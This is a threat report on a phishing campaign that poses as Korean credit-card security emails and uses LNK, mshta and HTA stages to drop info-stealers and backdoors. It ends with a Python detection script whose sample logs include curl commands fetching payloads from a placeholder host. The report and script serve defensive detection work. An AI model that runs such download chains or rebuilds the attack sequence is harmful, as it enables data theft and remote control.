Essential Insights
- Attackers disguise malicious files as legitimate security emails from a major credit card company, leveraging obfuscated scripts and environment-dependent payloads to evade detection.
- Malicious behavior varies based on whether security services like Windows Defender are active, downloading data-stealing, keylogging, backdoor, and credential theft tools.
- The malware employs environment-aware techniques, such as decrypting and loading DLLs to evade virtualized analysis, while targeting browsers and email clients for sensitive data exfiltration.
Threat Overview, Attack Techniques, and Targets
The threat involves malicious files disguised as security emails from a major credit card company in Korea. Attackers target users who open these emails. They use a malicious LNK (shortcut) file that runs an obfuscated VBScript via mshta.exe. This script executes a hidden HTA (HTML Application) file, which then downloads and runs decoy documents that look real. The malware checks if Windows Defender’s security service is active. Depending on this, it downloads different malicious files.
If Windows Defender is active, the malware uses Curl to download an encrypted pipe.log file; after decryption and decompression, it runs files that steal information and open backdoors. If Defender is off, the malware instead downloads files into the %LocalAppData% folder, including user.txt and sys.log. The sys.log file is decrypted to run sys.dll, which loads additional malicious tools. The files involved take formats such as logs, PowerShell scripts, and HTML files.
Targets include credit card users and their browser accounts, email clients, and cryptocurrency wallets. The malware also imitates legitimate documents to trick victims into opening links or files.
Impact, Security Implications, and Remediation Guidance
The malware can steal sensitive user information such as browser accounts, email data, and clipboard content. It also opens backdoors for remote command control. This can lead to data theft, unauthorized access, and potential financial fraud. The attack exploits trust by disguising malicious files as secure emails. It changes its behavior based on the security environment, which makes it more difficult to detect.
For organizations, this attack underlines the importance of verifying email sources and checking system integrity. Users should avoid executing suspicious files. On an infected system, immediate steps include checking registry entries for anomalies and deleting malicious files found in temporary folders or under the %LocalAppData% path.
As specific remediation steps depend on the environment, users and organizations should consult their security vendors or official guidance for detailed procedures. They should also consider monitoring network traffic for known malicious URLs and updating security tools to detect similar threats.
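The following Python sketch is an added example and not code from the original report or from any security vendor. It turns the chain described in the threat overview (mshta.exe executing VBScript or an HTA file, Curl fetching pipe.log, the user.txt / sys.log / sys.dll artifacts under %LocalAppData%) into a few detection rules run over process-creation records, and adds the on-disk hunting step from the remediation guidance (artifact names under %LocalAppData% or a Temp folder). Only the artifact names come from the report; the log layout, field names, sample records, sample paths and hostnames are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Artifact names are taken from the report above; everything else in this
# file (log layout, field names, sample records, paths) is constructed.
ARTIFACT_NAMES = ("pipe.log", "user.txt", "sys.log", "sys.dll")
# Matches either the unexpanded %LocalAppData% variable or its expanded form.
LOCALAPPDATA_RE = re.compile(r"(?:%localappdata%|\\appdata\\local\\)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    record: str


def parse_record(line):
    """Parse a 'Key=Value|Key=Value' process-creation record (constructed
    format, loosely modelled on Sysmon event ID 1 fields) into a dict with
    lower-cased keys."""
    fields = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def classify(rec):
    """Return the names of the rules a single record matches."""
    image = rec.get("image", "").lower()
    cmd = rec.get("cmdline", "").lower()
    hits = []
    # Stage 1: the LNK launches mshta.exe with inline VBScript or an HTA file.
    if image.endswith("mshta.exe") and ("vbscript:" in cmd or ".hta" in cmd):
        hits.append("mshta_script_execution")
    # Stage 2, Defender active: Curl fetches the encrypted pipe.log.
    if image.endswith("curl.exe") and "pipe.log" in cmd:
        hits.append("curl_pipe_log_download")
    # Stage 2, Defender off: user.txt / sys.log / sys.dll under %LocalAppData%.
    if LOCALAPPDATA_RE.search(cmd) and any(name in cmd for name in ARTIFACT_NAMES):
        hits.append("localappdata_artifact_reference")
    return hits


def scan(lines):
    """Run every rule over every record and collect the findings in order."""
    return [Finding(rule, line) for line in lines for rule in classify(parse_record(line))]


def hunt_paths(paths):
    """Hunting step from the remediation guidance: report files whose name is one
    of the known artifacts and that sit under %LocalAppData% or a Temp folder."""
    suspicious = []
    for path in paths:
        name = path.rsplit("\\", 1)[-1].lower()
        in_hot_dir = LOCALAPPDATA_RE.search(path) or "\\temp\\" in path.lower()
        if name in ARTIFACT_NAMES and in_hot_dir:
            suspicious.append(path)
    return suspicious


# Constructed sample records; hostnames use the reserved .invalid TLD.
SAMPLE_LOGS = [
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|CmdLine=mshta.exe vbscript:Execute("<obfuscated script>")',
    r"ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\curl.exe|CmdLine=curl.exe -s -o %LocalAppData%\pipe.log http://c2.invalid/pipe.log",
    r"ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\curl.exe|CmdLine=curl.exe -s -o C:\Users\alice\AppData\Local\sys.log http://c2.invalid/sys.log",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\curl.exe|CmdLine=curl.exe -O https://docs.invalid/index.html",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CmdLine=notepad.exe C:\Users\alice\notes.txt",
]

# Constructed file listing for the hunting step.
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Local\user.txt",
    r"C:\Users\alice\AppData\Local\Temp\sys.dll",
    r"C:\Users\alice\Documents\user.txt",
    r"C:\Windows\System32\user32.dll",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.rule}] {f.record}")
    for p in hunt_paths(SAMPLE_PATHS):
        print(f"[artifact_on_disk] {p}")
```

The rules are deliberately narrow to the artifacts the report names, so a benign Curl download (the fourth sample record) and an ordinary user.txt outside %LocalAppData% produce no finding. In practice the records would come from Sysmon or EDR process telemetry; the mshta.exe rule is the most generic of the three and the one most likely to survive a change of file names in a later variant.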
